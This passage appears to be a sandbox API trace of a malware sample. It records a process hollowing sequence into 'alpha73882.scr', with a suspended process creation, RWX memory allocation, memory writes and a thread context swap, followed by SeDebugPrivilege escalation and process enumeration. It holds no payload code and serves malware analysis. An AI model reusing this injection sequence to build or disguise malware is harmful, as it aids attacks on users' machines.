lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|y\x1f\x02C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.scr", lpUsedDefaultChar=0x0) returned 0 [0314.346] CreateProcessA (in: lpApplicationName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.scr", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18dcc4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18df44 | out: lpCommandLine="", lpProcessInformation=0x18df44*(hProcess=0x29c, hThread=0x47c, dwProcessId=0x13c8, dwThreadId=0x12b8)) returned 1 [0314.401] CoTaskMemFree (pv=0x0) [0314.409] GetThreadContext (in: hThread=0x47c, lpContext=0x255f468 | out: lpContext=0x255f468*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x300000, Edx=0x0, Ecx=0x0, Eax=0x91c06e, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0314.410] ReadProcessMemory (in: hProcess=0x29c, lpBaseAddress=0x300008, lpBuffer=0x18df34, nSize=0x4, lpNumberOfBytesRead=0x18df78 | out: lpBuffer=0x18df34*, lpNumberOfBytesRead=0x18df78*=0x4) returned 1 [0314.410] VirtualAllocEx (hProcess=0x29c, lpAddress=0x400000, dwSize=0xa2000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0314.415] WriteProcessMemory (in: hProcess=0x29c, lpBaseAddress=0x400000, lpBuffer=0x3ed0120*, nSize=0x400, lpNumberOfBytesWritten=0x18df78 | out: lpBuffer=0x3ed0120*, lpNumberOfBytesWritten=0x18df78*=0x400) returned 1 [0314.494] WriteProcessMemory (in: hProcess=0x29c, lpBaseAddress=0x401000, lpBuffer=0x255f740*, nSize=0x13800, lpNumberOfBytesWritten=0x18df78 | out: lpBuffer=0x255f740*, lpNumberOfBytesWritten=0x18df78*=0x13800) returned 1 [0327.284] WriteProcessMemory (in: hProcess=0x29c, lpBaseAddress=0x415000, lpBuffer=0x2663b40*, nSize=0x4200, lpNumberOfBytesWritten=0x18df78 | out: lpBuffer=0x2663b40*, lpNumberOfBytesWritten=0x18df78*=0x4200) returned 1 [0327.311] WriteProcessMemory (in: hProcess=0x29c, lpBaseAddress=0x41a000, lpBuffer=0x2667d4c*, nSize=0x200, lpNumberOfBytesWritten=0x18df78 | out: lpBuffer=0x2667d4c*, lpNumberOfBytesWritten=0x18df78*=0x200) returned 1 [0327.338] WriteProcessMemory (in: hProcess=0x29c, lpBaseAddress=0x4a0000, lpBuffer=0x2667f58*, nSize=0x2000, lpNumberOfBytesWritten=0x18df78 | out: lpBuffer=0x2667f58*, lpNumberOfBytesWritten=0x18df78*=0x2000) returned 1 [0327.371] WriteProcessMemory (in: hProcess=0x29c, lpBaseAddress=0x300008, lpBuffer=0x2669f64*, nSize=0x4, lpNumberOfBytesWritten=0x18df78 | out: lpBuffer=0x2669f64*, lpNumberOfBytesWritten=0x18df78*=0x4) returned 1 [0327.385] SetThreadContext (hThread=0x47c, lpContext=0x255f468*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x300000, Edx=0x0, Ecx=0x0, Eax=0x4139de, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0327.389] ResumeThread (hThread=0x47c) returned 0x1 [0327.787] CoGetContextToken (in: pToken=0x18e320 | out: pToken=0x18e320) returned 0x0 [0327.787] CObjectContext::QueryInterface () returned 0x0 [0327.787] CObjectContext::GetCurrentThreadType () returned 0x0 [0327.788] Release () returned 0x3 [0327.788] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x13880, cHandles=0x1, pHandles=0x9166a8*=0x14c, lpdwindex=0x18e1c4 | out: lpdwindex=0x18e1c4) returned 0x0 Thread: id = 154 os_tid = 0xe7c Thread: id = 156 os_tid = 0x1374 Thread: id = 157 os_tid = 0xe94 [0183.990] CoGetContextToken (in: pToken=0x441f834 | out: pToken=0x441f834) returned 0x800401f0 [0183.990] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0183.991] RoInitialize () returned 0x1 [0183.991] RoUninitialize () returned 0x0 [0233.516] GdipDeleteFont (font=0x4ab1f08) returned 0x0 [0233.517] CloseHandle (hObject=0x2a0) returned 1 [0233.517] CloseHandle (hObject=0x2b0) returned 1 [0233.517] CloseHandle (hObject=0x29c) returned 1 [0233.517] CloseHandle (hObject=0x2a8) returned 1 [0233.517] CloseHandle (hObject=0x2b4) returned 1 [0233.517] CloseHandle (hObject=0x2a4) returned 1 [0233.518] CloseHandle (hObject=0x298) returned 1 [0233.518] CloseHandle (hObject=0x2ac) returned 1 [0316.101] CloseHandle (hObject=0x4f0) returned 1 [0316.103] CloseHandle (hObject=0x3c8) returned 1 [0316.104] CloseHandle (hObject=0x3c0) returned 1 [0316.104] CloseHandle (hObject=0x3c4) returned 1 [0316.104] CloseHandle (hObject=0x2fc) returned 1 [0327.795] SetWindowLongW (hWnd=0xa001e, nIndex=-4, dwNewLong=1951336416) returned 76678630 [0327.800] SetClassLongW (hWnd=0xa001e, nIndex=-24, dwNewLong=1951336416) returned 0x49205be [0327.802] PostMessageW (hWnd=0xa001e, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0327.805] GetModuleHandleW (lpModuleName=0x0) returned 0x4f0000 [0327.806] UnregisterClassW (lpClassName="WindowsForms10.Window.8.app.0.141b42a_r10_ad1", hInstance=0x4f0000) returned 0 [0327.807] EtwEventUnregister (RegHandle=0x955120) returned 0x0 [0327.808] IsWindow (hWnd=0xc002c) returned 1 [0327.812] GetModuleHandleW (lpModuleName="user32.dll") returned 0x77580000 [0327.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x441f5d4, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcWþnÐ~\x09", lpUsedDefaultChar=0x0) returned 14 [0327.813] GetProcAddress (hModule=0x77580000, lpProcName="DefWindowProcW") returned 0x744f07e0 [0327.814] SetWindowLongW (hWnd=0xc002c, nIndex=-4, dwNewLong=1951336416) returned 76678750 [0327.815] SetClassLongW (hWnd=0xc002c, nIndex=-24, dwNewLong=1951336416) returned 0x492065e [0327.815] IsWindow (hWnd=0xc002c) returned 1 [0327.815] DestroyWindow (hWnd=0xc002c) returned 0 [0327.816] PostMessageW (hWnd=0xc002c, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0327.816] SetConsoleCtrlHandler (HandlerRoutine=0x4920636, Add=0) returned 1 [0328.276] GdipDisposeImage (image=0x5d1b670) returned 0x0 [0328.279] GdipDisposeImage (image=0x5d1a9c8) returned 0x0 [0328.301] GdipDeleteFont (font=0x4ab0568) returned 0x0 [0328.309] CloseHandle (hObject=0x270) returned 1 [0328.321] CloseThemeData () returned 0x0 [0328.322] CloseHandle (hObject=0x2d8) returned 1 [0328.322] CloseHandle (hObject=0x2e0) returned 1 [0328.323] UnmapViewOfFile (lpBaseAddress=0x2270000) returned 1 [0328.323] RegCloseKey (hKey=0x80000004) returned 0x0 Thread: id = 160 os_tid = 0xec4 Thread: id = 161 os_tid = 0xec8 Thread: id = 188 os_tid = 0xf40 Thread: id = 192 os_tid = 0xfdc [0258.676] CoGetContextToken (in: pToken=0x5f7f56c | out: pToken=0x5f7f56c) returned 0x0 [0258.676] CObjectContext::QueryInterface () returned 0x0 [0258.677] CObjectContext::GetCurrentThreadType () returned 0x0 [0258.677] Release () returned 0x0 Thread: id = 198 os_tid = 0xd04 [0312.866] CoGetContextToken (in: pToken=0xa4efa2c | out: pToken=0xa4efa2c) returned 0x0 [0312.866] CObjectContext::QueryInterface () returned 0x0 [0312.866] CObjectContext::GetCurrentThreadType () returned 0x0 [0312.866] Release () returned 0x0 Thread: id = 199 os_tid = 0xcfc [0289.994] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0289.994] RoInitialize () returned 0x1 [0289.994] RoUninitialize () returned 0x0 [0290.290] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xa72ee5c | out: lpLuid=0xa72ee5c*(LowPart=0x14, HighPart=0)) returned 1 [0290.298] GetCurrentProcess () returned 0xffffffff [0290.299] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0xa72ee58 | out: TokenHandle=0xa72ee58*=0x30c) returned 1 [0290.300] AdjustTokenPrivileges (in: TokenHandle=0x30c, DisableAllPrivileges=0, NewState=0x2386894*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0290.301] CloseHandle (hObject=0x30c) returned 1 [0290.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3e960e0, Length=0x20000, ResultLength=0xa72f540 | out: SystemInformation=0x3e960e0, ResultLength=0xa72f540*=0x16d48) returned 0x0 [0293.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3e960e0, Length=0x20000, ResultLength=0xa72f540 | out: SystemInformation=0x3e960e0, ResultLength=0xa72f540*=0x16dc8) returned 0x0 [0296.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, 